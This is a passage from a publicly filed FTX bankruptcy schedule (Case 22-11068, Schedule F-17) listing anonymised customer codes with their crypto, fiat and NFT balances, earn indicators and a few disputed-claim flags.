| 07375679 | | BRZ[1], CUSDT[2], DOGE[.43766834], GRT[15331.33877624], SOL[.61195467], TRX[2], UNI[2], USD[0.45], USDT[1] | | |
| 07375681 | | DOGE[141.75218457], USD[0.00] | | |
| 07375682 | | USD[10.00] | | |
| 07375683 | | TRX[5801.45694467], USD[0.00] | Yes | |
| 07375684 | | USD[10.00] | | |
| 07375685 | | DOGE[1], USD[0.00] | | |
| 07375686 | | USD[10.00] | | |
| 07375687 | | SOL[1.95942185], USD[0.00], USDT[.4250694] | | |
| 07375688 | | USD[0.00] | | |
| 07375689 | | USD[0.12] | | |
| 07375690 | | BTC[.00004251], ETH[.00109835], ETHW[.00109835], UNI[.04951222], USD[5.00] | | |
| 07375691 | | BTC[0], USD[1800.49] | | |
| 07375693 | | MATIC[14.6318896], USD[0.00] | Yes | |
| 07375694 | | AVAX[.95961833], BAT[1.00194987], BRZ[5.07952967], CUSDT[10], DOGE[7], GRT[958.77294428], NFT [447968026327044833/Momentum #496][1], NFT [570175475551962623/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #73][1], SHIB[2], TRX[12.00984452], UNI[2.14790388], USD[817.08], USDT[6.52288278] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375695 | | USD[10.99] | Yes | |
| 07375696 | | BTC[.02026859], CUSDT[2], DOGE[2.02909194], ETH[.01667273], ETHW[.01667273], USD[0.22] | | |
| 07375697 | | CUSDT[2], DOGE[74.99294766], TRX[1], USD[0.51] | | |
| 07375698 | | AUD[2.19], BRZ[1], CUSDT[1], SHIB[2], TRX[1], USD[136.05] | Yes | |
| 07375699 | | USD[10.00] | | |
| 07375700 | | USD[10.99] | Yes | |
| 07375701 | | ETH[.00594007], ETHW[.00587162], USD[0.00] | Yes | |
| 07375702 | | DOGE[10.99266417], USD[5.00] | | |
| 07375703 | | USD[10.00] | | |
| 07375704 | | USD[10.00] | | |
| 07375705 | | USD[0.00], USDT[0] | | |
| 07375706 | | DOGE[161.80230537], ETH[0.00612475], ETHW[0.00612475], USD[0.00] | | |
| 07375707 | | USD[10.00] | | |
| 07375708 | | USD[10.00] | | |
| 07375709 | | USD[10.00] | | |
| 07375710 | | USD[10.00] | | |
| 07375711 | | DOGE[25.13125477], USD[0.00] | Yes | |
| 07375712 | | USD[0.00] | | |
| 07375713 | | BTC[0], DOGE[0], USD[43.18] | | |
| 07375714 | | CUSDT[1], DOGE[2268.18109959], USD[4.92] | | |
| 07375715 | | USD[10.00] | | |
| 07375716 | | USD[10.00] | | |
| 07375717 | | USD[10.00] | | |
| 07375718 | | BAT[0], BRZ[37.27646910], CHF[0.00], CUSDT[647.77262612], EUR[2.03], HKD[0.00], KSHIB[0], MATIC[0], PAXG[0], SGD[0.00], SHIB[3], SOL[0], TRX[0], USD[0.00], USDT[0.00104336], ZAR[0.00] | Yes | |
| 07375719 | | USD[10.00] | | |
| 07375720 | | DOGE[141.36487504], TRX[1], USD[0.00] | | |
| 07375721 | | DOGE[.28945118], USD[0.00] | | |
| 07375722 | | BAT[1], BRZ[4], BTC[.0198269], CUSDT[26], DOGE[16132.93049408], ETH[4.58834541], ETHW[31.50959592], GRT[1.00028737], LINK[.00035508], MATIC[897.35090387], SHIB[114148704.57217208], SOL[21.87145844], TRX[18.62823856], USD[943.06], USDT[2.14098421] | Yes | |
| 07375723 | | USD[10.00] | | |
| 07375724 | | TRX[1], USD[107.99] | Yes | |
| 07375725 | | ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07375726 | | USD[10.00] | | |
| 07375728 | | USD[10.00] | | |
| 07375729 | | BRZ[2], CUSDT[1], DOGE[3], TRX[4], USD[0.01], USDT[1] | | |
| 07375730 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07375731 | | USD[10.00] | | |
| 07375732 | | USD[10.00] | | |
| 07375733 | | USD[10.00] | | |
| 07375734 | | DOGE[147.99304414], USD[0.00] | | |
| 07375735 | | DOGE[2907.97674418], SHIB[158831.00381194], USD[0.00] | | |
| 07375736 | | CUSDT[9], DOGE[2481.08257181], ETH[.02971193], ETHW[.02934257], LTC[.02279013], TRX[1], USD[0.00] | Yes | |
| 07375737 | | USD[10.00] | | |
| 07375738 | | USD[10.00] | | |
| 07375739 | | ETH[.00095578], ETHW[0.00095577], USD[0.00] | | |
| 07375740 | | USD[10.00] | | |
| 07375742 | | BRZ[0], USD[0.00] | | |
| 07375743 | | CUSDT[1.04294818], GRT[2], USD[0.00] | | |
| 07375744 | | USD[10.00] | | |
| 07375745 | | USD[10.00] | | |
| 07375746 | | USD[10.00] | | |
| 07375747 | | USD[0.00] | | |
| 07375748 | | BAT[1], BRZ[3], CUSDT[1], GRT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07375749 | | USD[0.00] | | |
| 07375750 | | USD[10.00] | | |
| 07375752 | | USD[10.00] | | |
| 07375753 | | USD[10.00] | | |
| 07375755 | | USD[10.00] | | |
| 07375756 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375757 | | USD[10.00] | | |
| 07375758 | | BAT[0], BCH[0], BRZ[0], BTC[0], CAD[0.00], CUSDT[1], DAI[0], DOGE[0], ETH[0], GBP[0.00], GRT[0], LINK[0], MATIC[0], SHIB[7764712.68224214], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07375759 | | USD[0.00] | | |
| 07375760 | | USD[10.00] | | |
| 07375761 | | TRX[170.61454506], USD[0.00] | | |
| 07375762 | | USD[10.00] | | |
| 07375763 | | CUSDT[2], DOGE[7.25962618], TRX[1], USD[0.00] | | |
| 07375764 | | USD[10.00] | | |
| 07375765 | | USD[10.00] | | |
| 07375766 | | USD[10.00] | | |
| 07375768 | | BRZ[1], BTC[.01812728], CUSDT[1], DOGE[83583.33494145], ETH[1.05241279], ETHW[1.05241279], SOL[1], TRX[1], USD[0.00], USDT[3] | | |
| 07375769 | | BTC[0], ETH[0], USD[0.00] | | |
| 07375770 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[5.39] | | |
| 07375771 | | USD[10.00] | | |
| 07375772 | | USD[10.00] | | |
| 07375773 | | USD[10.00] | | |
| 07375774 | | USD[10.00] | | |
| 07375775 | | BRZ[1], CUSDT[1], GRT[.00449619], SUSHI[.00002507], TRX[1], USD[0.05] | Yes | |
| 07375776 | | USD[10.00] | | |
| 07375778 | | USD[10.00] | | |
| 07375779 | | AAVE[.25850565], CUSDT[66.23608518], DOGE[12735.37403149], ETH[.07394914], ETHW[.07303205], GRT[89.53379835], KSHIB[951.4495389], MATIC[85.36030639], SHIB[68967669.79336161], SOL[3.14632455], TRX[405.72977342], USD[0.00], USDT[0] | Yes | |
| 07375781 | | USD[10.00] | | |
| 07375782 | | USD[10.00] | | |
| 07375783 | | USD[10.00] | | |
| 07375785 | | DOGE[136.05758719], USD[0.00] | | |
| 07375787 | | BAT[.00002486], CUSDT[3], TRX[.00001576], USD[0.00], USDT[0.00004993] | | |
| 07375788 | | ETH[.00573011], ETHW[.00566166], USD[0.00] | Yes | |
| 07375789 | | USD[10.00] | | |
| 07375790 | | USD[10.00] | | |
| 07375791 | | BAT[.00204321], CUSDT[.26141619], ETHW[.12162479], SHIB[74244.68241708], TRX[6818.97768588], UNI[.00012556], USD[49.23] | Yes | |
| 07375792 | | CUSDT[2], EUR[5.39], USD[2.00] | | |
| 07375793 | | USD[10.00] | | |
| 07375794 | Contingent, Disputed | USD[0.00], USDT[0] | | |
| 07375795 | | CUSDT[51], DOGE[0], GRT[1], KSHIB[0], SHIB[3], TRX[0], USD[556.04] | | |
| 07375796 | | USD[10.00] | | |
| 07375797 | | USD[10.00] | | |
| 07375799 | | USD[10.00] | | |
| 07375800 | | USD[10.00] | | |
| 07375801 | | USD[10.00] | | |
| 07375803 | | CUSDT[2], USD[0.00] | | |
| 07375804 | | USD[10.00] | | |
| 07375805 | | USD[0.00] | | |
| 07375806 | | USD[10.00] | | |
| 07375808 | | TRX[1], USD[133.50] | | |
| 07375809 | | BAT[1], BRZ[2], USD[0.00] | | |
| 07375810 | | BTC[.00021263], USD[0.00] | | |
| 07375811 | | USD[10.00] | | |
| 07375812 | | USD[10.00] | | |
| 07375814 | | BTC[.00026412], USD[0.00] | Yes | |
| 07375815 | | BRZ[1], CUSDT[5], DOGE[276.54256702], TRX[1], USD[0.00] | | |
| 07375817 | | USD[0.01] | | |
| 07375818 | | CUSDT[1], DOGE[8.94165198], LINK[1.03914993], SHIB[1], TRX[1], USD[0.64], USDT[5.21521986] | Yes | |
| 07375819 | | USD[10.00] | | |
| 07375821 | | USD[10.00] | | |
| 07375822 | | USD[10.00] | | |
| 07375823 | | DOGE[41.64454126], USD[0.00] | | |
| 07375825 | | USD[10.00] | | |
| 07375826 | | BAT[0], BRZ[21.32539596], BTC[0], CUSDT[32], DOGE[26.72026878], ETH[0], GRT[7.44935930], MATIC[0], SHIB[20], TRX[33.29991197], USD[2807.73], USDT[11.83491065] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375827 | | BRZ[1], BTC[.00000012], CUSDT[1], DOGE[.02258397], SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07375828 | | USD[0.01] | | |
| 07375829 | | USD[10.00] | | |
| 07375830 | | USD[10.00] | | |
| 07375831 | | USD[10.00] | | |
| 07375832 | | USD[10.00] | | |
| 07375833 | | USD[0.00] | | |
| 07375835 | | DOGE[28.96886148], USD[0.00] | | |
| 07375836 | | USD[0.00] | Yes | |
| 07375838 | | USD[10.51] | Yes | |
| 07375839 | | USD[10.00] | | |
| 07375840 | | USD[10.00] | | |
| 07375841 | | USD[10.00] | | |
| 07375842 | | CUSDT[1], DOGE[2], GRT[.00047849], TRX[1], USD[0.32] | | |
| 07375843 | | USD[0.00] | | |
| 07375844 | | USD[10.00] | | |
| 07375845 | | USD[5.00] | | |
| 07375846 | | BAT[0], DOGE[0], ETH[0], TRX[0], USD[0.01] | | |
| 07375847 | | DOGE[.00194526], USD[0.00] | | |
| 07375848 | | USD[10.00] | | |
| 07375849 | | USD[10.00] | | |
| 07375850 | | BTC[.00021404], USD[0.00] | | |
| 07375851 | | AVAX[.07682975], BTC[.01003064], ETH[.0005461], MKR[.00000468], USD[2.59], USDT[0] | | |
| 07375852 | | USD[10.00] | | |
| 07375853 | | USDT[.01693364] | | |
| 07375854 | | CUSDT[5.78111371], DOGE[0], USD[0.00] | | |
| 07375855 | | USD[10.00] | | |
| 07375857 | | USD[0.01] | | |
| 07375858 | | CUSDT[2], DOGE[43.74016978], TRX[1], USD[0.00] | | |
| 07375859 | | USD[10.00] | | |
| 07375860 | | USD[10.00] | | |
| 07375861 | | USD[10.00] | | |
| 07375862 | | USD[0.00] | Yes | |
| 07375864 | | CUSDT[514.45671532], USD[0.00] | Yes | |
| 07375865 | | CUSDT[4], USD[110.27] | | |
| 07375866 | | CUSDT[1], DOGE[35.99187303], USD[12.00] | | |
| 07375867 | | DOGE[130.59725406], USD[0.00] | Yes | |
| 07375868 | | USD[10.00] | | |
| 07375869 | | USD[10.00] | | |
| 07375870 | | ALGO[33.22295012], BF_POINT[100], CUSDT[30], DOGE[1], GRT[89.70976952], SHIB[3], TRX[.03598297], USD[0.00] | Yes | |
| 07375871 | | USD[10.40] | Yes | |
| 07375872 | | USD[10.00] | | |
| 07375873 | | USD[10.00] | | |
| 07375874 | | USD[10.00] | | |
| 07375875 | | DOGE[1.09441225], USD[0.00] | | |
| 07375876 | | USD[10.00] | | |
| 07375877 | | USD[10.00] | | |
| 07375878 | | CUSDT[21], DOGE[124.94265129], KSHIB[1886.34222209], SHIB[958640.71474034], SUSHI[7.54929734], TRX[2], USD[2.37], USDT[.99368547] | Yes | |
| 07375879 | | DOGE[92.98430077], USD[37.69] | | |
| 07375881 | | BAT[1], BRZ[2], CUSDT[2], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07375882 | | USD[10.00] | | |
| 07375883 | | DOGE[999.91384324], USD[0.00] | Yes | |
| 07375884 | | BRZ[1], CUSDT[6], DOGE[0.00452645], TRX[26.05396539], USD[0.11] | | |
| 07375885 | | CUSDT[3], DOGE[215.30976435], LTC[.08149233], USD[0.01] | | |
| 07375886 | | BAT[1.01655549], BRZ[1], CUSDT[1], DOGE[1105.54654295], SHIB[4064.02383038], SOL[3.64512061], USD[0.00], USDT[1.10860718] | Yes | |
| 07375887 | | USD[10.00] | | |
| 07375888 | | DOGE[150.52601307], USD[0.00] | Yes | |
| 07375889 | | CUSDT[2.8298885], USD[0.86], USDT[0.00908342] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375890 | | DOGE[202.30586343], USD[0.00] | Yes | |
| 07375891 | | BTC[0], USD[0.00] | | |
| 07375892 | | BRZ[1], BTC[0.00406609], CUSDT[1], DOGE[3916.85688210], SOL[1], TRX[1], USD[0.00] | | |
| 07375893 | | USD[0.01], USDT[0] | | |
| 07375894 | | USD[0.01] | | |
| 07375895 | | USD[0.00] | | |
| 07375896 | | BRZ[1], CUSDT[4], DOGE[16527.49619471], TRX[12149.28814698], USD[0.00] | | |
| 07375897 | | USD[0.00], USDT[0] | | |
| 07375898 | | BAT[0], BRZ[0.00000004], BTC[0], DOGE[0.73698187], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07375899 | | DOGE[137.05730832], USD[0.00] | | |
| 07375900 | | BRZ[3], CUSDT[3], DOGE[2], TRX[1], USD[0.01], USDT[1] | | |
| 07375901 | | DOGE[145.71371451], USD[0.00] | | |
| 07375902 | | DOGE[2], USD[0.00] | | |
| 07375904 | | ETH[0.84540836], ETHW[0.84505324], MATIC[0], SHIB[6290.64409560], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07375905 | | GRT[5.44577027], USD[0.00] | | |
| 07375906 | | BTC[.00000003], TRX[1], USD[0.00] | | |
| 07375907 | | USD[10.00] | | |
| 07375910 | | USD[0.03] | | |
| 07375911 | | USD[10.00] | | |
| 07375912 | | DOGE[19.18208325], USD[0.00] | | |
| 07375914 | | USD[10.00] | | |
| 07375915 | | BCH[0], BRZ[1], CUSDT[1], DOGE[1], GRT[0.00000004], USD[0.00], USDT[1] | | |
| 07375916 | | CUSDT[6], DOGE[1], ETH[.12866153], ETHW[.12756992], SHIB[2], SOL[8.90005317], USD[0.00] | Yes | |
| 07375918 | | USD[10.00] | | |
| 07375919 | | CUSDT[2], DOGE[6.23965054], KSHIB[444.707866], USD[0.00] | Yes | |
| 07375920 | | BTC[.00021453], CUSDT[1], DOGE[.00121007], KSHIB[1532.22821763], SHIB[351419.73573235], TRX[2], USD[0.02] | | |
| 07375921 | | TRX[.00415401], USD[0.00] | | |
| 07375922 | | BRZ[1], CUSDT[5], DOGE[.00043249], ETH[.02135804], ETHW[.02135804], TRX[2], USD[0.01] | | |
| 07375923 | | USD[10.00] | | |
| 07375924 | | USD[10.00] | | |
| 07375925 | | USD[0.00] | Yes | |
| 07375926 | | DOGE[143.06213045], USD[0.00] | | |
| 07375927 | | DOGE[1652.35413879], USD[0.00] | | |
| 07375928 | | USD[10.00] | | |
| 07375931 | | BRZ[0], DOGE[1], USD[5.87] | | |
| 07375932 | | USD[10.00] | | |
| 07375933 | | CUSDT[231.9152047], DOGE[801.18391595], TRX[1], USD[5.00] | | |
| 07375934 | | USD[10.00] | | |
| 07375935 | | TRX[161.12246935], USD[0.00] | | |
| 07375937 | Contingent, Disputed | SOL[0], USDT[0.00000045] | | |
| 07375938 | | DOGE[121.58140446], USD[0.00] | | |
| 07375940 | | USD[10.00] | | |
| 07375942 | | USD[10.00] | | |
| 07375943 | | BTC[.00015193], CUSDT[5], DOGE[35.54426233], ETH[.00058701], ETHW[.00058701], USD[1.55] | | |
| 07375944 | | USD[10.00] | | |
| 07375945 | | ETH[.00498212], ETHW[.00498212], USD[0.00] | | |
| 07375946 | | SHIB[4], USD[18.86] | Yes | |
| 07375947 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07375948 | | BRZ[0], USD[0.00] | | |
| 07375949 | | USD[10.00] | | |
| 07375950 | | CUSDT[1], DOGE[2], TRX[3.3673246], USD[0.01] | | |
| 07375951 | | USD[10.00] | | |
| 07375952 | | CUSDT[1], DOGE[255.49922823], MATIC[9.28369131], SHIB[178539.54650955], TRX[172.46651433], USD[0.00] | | |
| 07375953 | | USD[10.07] | | |
| 07375954 | | USD[10.00] | | |
| 07375955 | | DOGE[126.67731854], USD[0.00] | | |
| 07375957 | | BAT[.95896052], CUSDT[2], DOGE[4], TRX[893.74998288], USD[0.01] | | |
| 07375959 | | BRZ[1], DOGE[1498.38970942], TRX[2220.00024864], USD[0.00] | | |

West Realm Shires Services Inc.

Case 22-11068-JTD   Doc 1752   Filed 06/27/23   Page 936 of 1316

In re: FTX Trading Ltd., et al. Schedule F-17 Customer priority list - Customer Claims and Other Charges

22-11071 (JTD)

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07375960 | | BAT[1], BRZ[3], BTC[.01008533], CUSDT[2], DOGE[9063.51617877], GRT[3], SOL[2.86802621], TRX[4], USD[0.00] | | |
| 07375961 | | USD[10.00] | | |
| 07375963 | | USD[0.00] | | |
| 07375964 | | USD[0.13] | | |
| 07375965 | | USD[10.00] | | |
| 07375966 | | USD[0.00] | | |
| 07375968 | | USD[10.00] | | |
| 07375970 | | AVAX[.52627138], BAT[1], BTC[0.01322023], CUSDT[5], ETH[0.08222937], ETHW[0.08121576], LTC[.81083777], MATIC[0], SHIB[1], TRX[2.83457424], USD[0.00], USDT[0.00000032] | Yes | |
| 07375971 | | USD[10.00] | | |
| 07375973 | | ETH[.00534489], ETHW[.00534489], USD[0.00] | | |
| 07375974 | | DOGE[12.79730097], TRX[.00035042], USD[0.01] | | |
| 07375976 | | DOGE[135.20332145], TRX[1], USD[0.00] | | |
| 07375977 | | CUSDT[2], USD[0.00] | | |
| 07375979 | | BTC[0], SUSHI[0] | | |
| 07375980 | | USD[10.00] | | |
| 07375981 | | SUSHI[.61175094], USD[0.00] | Yes | |
| 07375982 | | BAT[0], BCH[0], BRZ[1], BTC[0], CUSDT[7], DOGE[2], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SHIB[.04824063], SOL[0], SUSHI[0], TRX[4], USD[0.00], USDT[0] | | |
| 07375983 | | DOGE[.1359678], USD[0.00] | | |
| 07375984 | | CAD[6.17], CUSDT[236.08513676], GRT[34.80356977], USD[0.00] | | |
| 07375985 | | USD[10.00] | | |
| 07375986 | | USD[10.00] | | |
| 07375987 | | USD[10.00] | | |
| 07375988 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07375990 | | USD[10.00] | | |
| 07375991 | | CUSDT[5], SHIB[2], USD[0.00] | | |
| 07375993 | | USD[10.00] | | |
| 07375994 | | DOGE[71.01283187], TRX[88.50597663], USD[0.00] | | |
| 07375995 | | USD[10.00] | | |
| 07375996 | | TRX[200.15596152], USD[0.00] | | |
| 07375997 | | USD[10.00] | | |
| 07375998 | | DOGE[160.78983909], USD[0.00] | Yes | |
| 07376000 | | CUSDT[2], TRX[94.23262196], USD[0.00] | | |
| 07376001 | | BAT[1], BRZ[1], TRX[3], USD[0.00], USDT[1] | | |
| 07376002 | | USD[0.01], USDT[0] | Yes | |
| 07376003 | | CUSDT[1], DOGE[55.22305545], TRX[1], USD[0.00] | | |
| 07376004 | | BAT[7.76875996], BRZ[17.7571653], BTC[0], CUSDT[71.02309043], DOGE[1], GRT[7.52815143], LINK[1.10982269], SOL[0], TRX[27.74557115], USD[0.02], USDT[5.54911422] | Yes | |
| 07376005 | | CUSDT[257.35439277], DOGE[196.89581405], TRX[1], USD[0.00] | Yes | |
| 07376006 | | USD[10.00] | | |
| 07376008 | | DOGE[139.61905777], USD[0.00] | | |
| 07376011 | | USD[10.00] | | |
| 07376012 | | USD[10.00] | | |
| 07376013 | | BTC[.0002193], CUSDT[1], USD[0.00] | | |
| 07376014 | | DOGE[157.62784759], KSHIB[0], MATIC[0], NFT (338739199940125315/Hall of Fantasy League #197)[1], SHIB[3678067.92380787], SOL[9.88699103], USD[0.00] | Yes | |
| 07376015 | | USD[0.00] | | |
| 07376016 | | USD[10.00] | | |
| 07376018 | | USD[10.00] | | |
| 07376020 | | TRX[176.27829971], USD[0.00] | | |
| 07376021 | | USD[10.00] | | |
| 07376023 | | USD[10.00] | | |
| 07376024 | | BTC[.00017589], CUSDT[1], DOGE[883.85505005], USD[0.00] | | |
| 07376025 | | BTC[0], USD[1.00] | | |
| 07376026 | | CUSDT[1], DOGE[.00777131], USD[0.00] | | |
| 07376027 | | DOGE[116.18124635], USD[0.65] | | |
| 07376029 | | BTC[.00021164], USD[0.00] | | |
| 07376030 | | USD[10.00] | | |
| 07376031 | | CUSDT[4], DOGE[1], USD[0.00] | Yes | |
| 07376032 | | USD[10.00] | | |
| 07376033 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376034 | | USD[10.00] | | |
| 07376035 | | USD[10.00] | | |
| 07376038 | | BAT[2], BRZ[1], TRX[4], USD[80.58] | | |
| 07376039 | | USD[10.00] | | |
| 07376040 | | BRZ[1], CUSDT[1], DOGE[.00001466], USD[0.00] | | |
| 07376041 | | BAT[29.67419478], BTC[.00245151], CUSDT[.00096966], DOGE[.00271662], ETH[.00792354], ETHW[.00782778], MATIC[5.69568164], SHIB[1075172.65106779], USD[0.00] | Yes | |
| 07376042 | | DOGE[0], GRT[0], USD[1.35], USDT[0.00000001] | Yes | |
| 07376043 | | USD[10.00] | | |
| 07376044 | | USD[10.00] | | |
| 07376047 | | BTC[0], ETH[0], ETHW[0], NFT (303395791113340741/1ST.EDDY-Bully TRX)[1], NFT (307278703963141797/Saltbae)[1], NFT (329428923891446127/1ST.EDDY-Bully ETH)[1], NFT (357234968634381039/1ST.EDDY-Bully DOT)[1], NFT (369914639592376614/Brick World #31)[1], NFT (368646651287112111/NFT Toys)[1], NFT (374402838148915345/1ST.EDDY- 2022 BULLY BTC)[1], NFT (378296324358664150/Baby Yoda Voxel)[1], NFT (379109269768281402/1ST.EDDY-Bully SOL)[1], NFT (394565867049196958/Dagg  Art #14)[1], NFT (410002180342189448/KuArmy #19)[1], NFT (427884575857439246/Xip)-Golden1#!)[1], NFT (434500868226343109/1ST.EDDY-Bully ADA)[1], NFT (460487404874095211/Brick World #42)[1], NFT (472956353408387234/Big Boss Voxi)[1], NFT (493163188818273038/Voxi People #11)[1], NFT (505599164100538575/Halloween #5)[1], NFT (510036921680524653/NFT Toys #3)[1], NFT (511094544597120818/SOL 1ST.EDDY-BULLY ETH (Rare))[1], NFT (529224722279421279/Abbath)[1], NFT (533550839693319959/SOL 1ST.EDDY-BULLY META (Rare))[1], NFT (556998754027055999/NFT Toys #15)[1], NFT (559280332826653432/Vox World #17)[1], NFT (564654843816313835/Brick World #33)[1], NFT (567866718364072566/BTC Monster )[1], NFT (575467843779931352/Brick World #6)[1], SHIB[0], SOL[.00000001], TRX[0], USD[0.00] | Yes | |
| 07376048 | | CUSDT[1], TRX[7055.87692125], USD[0.00] | | |
| 07376050 | | CUSDT[2], TRX[1], USD[13.18] | | |
| 07376053 | | BTC[0], DOGE[0], SOL[18.27121475], USD[0.00] | | |
| 07376054 | | USD[10.00] | | |
| 07376055 | | DOGE[1.0000308], TRX[1], USD[0.00] | | |
| 07376056 | | USD[10.00] | | |
| 07376058 | | DOGE[1], USD[23.78] | | |
| 07376060 | | CUSDT[1], TRX[1], USD[1.77] | | |
| 07376061 | | USD[10.00] | | |
| 07376063 | | ETHW[.328717], USD[0.33] | | |
| 07376064 | | BAT[1], BRZ[3], CUSDT[2], DOGE[124.47128602], TRX[3], USD[0.00] | | |
| 07376066 | | BCH[.00012418], BRZ[3], BTC[0], CUSDT[32], DOGE[0], TRX[8.00087675], USD[0.00], USDT[0] | Yes | |
| 07376068 | | USD[10.00] | | |
| 07376070 | | USD[10.00] | | |
| 07376071 | | USD[0.01] | | |
| 07376072 | | BTC[0], DOGE[34.27658466], USD[0.08] | | |
| 07376073 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07376074 | | BAT[1], BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.01], USDT[1] | | |
| 07376075 | | BRZ[2], CUSDT[4], DOGE[1], ETH[1.01262566], ETHW[1.01262566], GRT[326.394932], LINK[13.29698531], TRX[2], USD[0.00] | Yes | |
| 07376077 | | USD[0.00] | Yes | |
| 07376078 | | USD[10.00] | | |
| 07376079 | | BRZ[1], BTC[.013976], CUSDT[539.9957035], DOGE[11724.65124147], ETH[.1181196], ETHW[.11697736], LTC[.12189258], SHIB[4380730.34573371], TRX[9287.45840034], USD[1333.92] | Yes | |
| 07376080 | | DOGE[26.844824], USD[0.40] | | |
| 07376081 | | BTC[.00005108], ETH[0], SOL[0], TRX[1], USD[0.00], USDT[.289003] | Yes | |
| 07376082 | | USD[0.01] | | |
| 07376084 | | USD[10.00] | | |
| 07376085 | | CUSDT[3], DOGE[2.63763382], TRX[0], USD[0.00] | | |
| 07376086 | | DOGE[274.17288176], USD[10.00] | | |
| 07376087 | | DOGE[1], USD[0.00] | | |
| 07376088 | | USD[10.00] | | |
| 07376089 | | TRX[118.58276811], USD[0.00] | | |
| 07376092 | | USD[153.46], USDT[0] | Yes | |
| 07376093 | | USD[10.00] | | |
| 07376095 | | CUSDT[3], DOGE[124.6362442], SHIB[3671.43846563], USD[0.00] | Yes | |
| 07376096 | | ETH[0], NFT (469779752656218148/Eitbit Ape #5408)[1], SOL[.14], USD[273.41] | | |
| 07376097 | | USD[10.00] | | |
| 07376098 | | DOGE[2413.04275056], USD[10.00] | | |
| 07376100 | | BCH[.01030529], BTC[.00004016], DOGE[.90753914], ETH[.00384492], ETHW[.00384492], LTC[.02279606], USD[-4.42] | | |
| 07376101 | | DOGE[1], ETH[.00565281], ETHW[.00565281], SOL[.0000054], USD[0.00] | | |
| 07376102 | | DOGE[64.69464018], USD[0.00] | | |
| 07376103 | | USD[10.00] | | |
| 07376104 | | USD[10.00] | | |
| 07376105 | | BRZ[2], CUSDT[7], DOGE[201.64487767], TRX[1], USD[23.95] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376106 | | DOGE[129.01402963], USD[0.00] | | |
| 07376107 | | USD[10.90] | Yes | |
| 07376108 | | ALGO[125.30434126], AVAX[1.52964641], BAT[1.29459494], BF_POINT[300], BRZ[1], CUSDT[2], DOGE[1], ETH[.00000001], ETHW[2.03970813], GRT[869.95683196], LTC[.06929378], SHIB[708.18237677], TRX[1], USD[888.78], USDT[0] | Yes | |
| 07376110 | | CUSDT[7], DAI[.00058041], DOGE[0], ETH[0], TRX[1], USD[0.00] | | |
| 07376111 | | CUSDT[1], DOGE[385.90363352], USD[0.00] | Yes | |
| 07376112 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], ETHW[0], LINK[0.00000786], TRX[0.00002184], USD[0.00] | | |
| 07376113 | | DOGE[15.09926232], USD[0.00] | | |
| 07376114 | | USD[10.00] | | |
| 07376115 | | USD[10.00] | | |
| 07376116 | | USD[0.00] | | |
| 07376117 | | BRZ[4], CUSDT[5], DOGE[1.06562224], GRT[5], SUSHI[1], TRX[4], USD[0.00] | | |
| 07376118 | | USD[10.00] | | |
| 07376119 | | LTC[.04949193], USD[0.00] | | |
| 07376120 | | BRZ[1], CUSDT[1], DOGE[5], GRT[0], TRX[1], USD[0.00] | | |
| 07376122 | | CUSDT[2], USD[0.00] | | |
| 07376125 | | ETH[.00445189], ETHW[.00445189], USD[0.00] | | |
| 07376126 | | DOGE[126.76716598], USD[0.00] | | |
| 07376128 | | USD[10.00] | | |
| 07376129 | | USD[0.00] | Yes | |
| 07376131 | | USD[10.00] | | |
| 07376132 | | BRZ[1], CUSDT[4], DOGE[104.05106363], USD[0.00] | | |
| 07376133 | | BTC[0], ETHW[.000363], USD[0.22] | | |
| 07376134 | | USD[10.00] | | |
| 07376135 | | CUSDT[2], DOGE[1791.58880226], SHIB[1510296.60955927], TRX[367.87822344], USD[0.00] | Yes | |
| 07376138 | | USD[20.00] | | |
| 07376139 | | BAT[1], DOGE[6442.53964517], USD[501.51] | | |
| 07376141 | | USD[0.18] | Yes | |
| 07376142 | | USD[0.01] | | |
| 07376143 | | CUSDT[1], DOGE[50.85118636], USD[0.00] | | |
| 07376144 | | USD[10.00] | | |
| 07376145 | | BAT[12.94297057], BTC[.000831], CUSDT[1], DOGE[202.21691126], ETH[.02754012], ETHW[.02719787], LINK[.75191204], LTC[.10316764], MATIC[6.35726194], TRX[2], USD[21.22], USDT[5.28312049] | Yes | |
